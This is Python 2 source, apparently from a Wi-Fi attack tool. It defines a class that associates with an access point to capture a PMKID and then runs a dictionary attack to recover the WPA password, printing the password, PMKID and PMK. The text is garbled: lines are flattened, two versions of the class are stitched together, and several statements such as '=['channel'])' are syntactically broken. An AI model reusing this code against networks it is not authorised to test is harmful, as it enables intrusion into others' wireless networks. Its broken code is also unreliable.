class pmkid_GEN: def __init__(self, iface_instance, ap_instance): self.ap_instance = ap_instance self.iface_instance = iface_instance self.pmkid = PMKID(self.ap_instance['bssid'], self.ap_instance['essid'], self.iface_instance.iface, self.ap_instance['beacon'], DICTIONARY, _KEY_, pull, V__) =['channel']) def auth_gen(self): return self.pmkid.dev_conn() def asso_gen(self): return self.pmkid.asso_conn() def lets_crack(self): _pass, _hash, _hash_ = self.pmkid.crack() if _pass is None: pull.error("Password Not Found in Dictionary. Try enlarging it!") sys.exit() else: pull.use("Password Found: %s%s%s" % (pull.BOLD, _pass, pull.END)) if V__: pull.right("PMKID: ") print _hash_ pull.right("PMK: ") print _hash def channel(self, _ch): self.iface_instance.put_channel(_ch) return _ch
def __init__(self, iface_instance, ap_instance): self.ap_instance = ap_instance self.iface_instance = iface_instance self.pmkid = PMKID(self.ap_instance['bssid'], self.ap_instance['essid'], self.iface_instance.iface, self.ap_instance['beacon'], DICTIONARY, _KEY_, pull, V__) =['channel'])
class pmkid_GEN: def __init__(self, iface_instance, ap_instance, no_frames): self.ap_instance = ap_instance self.iface_instance = iface_instance self.pmkid = PMKID(self.ap_instance['bssid'], self.ap_instance['essid'], self.iface_instance.iface, self.ap_instance['beacon'],\ DICTIONARY, _KEY_, pull, V__, no_frames) =['channel']) def is_version2(self): if 'wpa2' in self.ap_instance['auth'].lower(): return True else: return False def auth_gen(self): to_return = self.pmkid.dev_conn() self.pmkid._PMKID__AUTH_STEP = False return to_return def asso_gen(self): _PACT = False while not _PACT: _PACT = self.pmkid.asso_conn() if not _PACT: # When Error was detected. pull.special("Times Up! Attempting to authenticate with Access Point.") self.auth_gen() return _PACT def lets_crack(self): _pass, _hash, _hash_ = self.pmkid.crack( WRITE__ ) if _pass is None: pull.error("Password Not Found in Dictionary. Try enlarging it!") sys.exit() else: pull.use("Password Found: %s%s%s" % (pull.BOLD, _pass, pull.END)) if V__: pull.right("PMKID: ") print _hash_ pull.right("PMK: ") print _hash def channel(self, _ch): self.iface_instance.put_channel(_ch) return _ch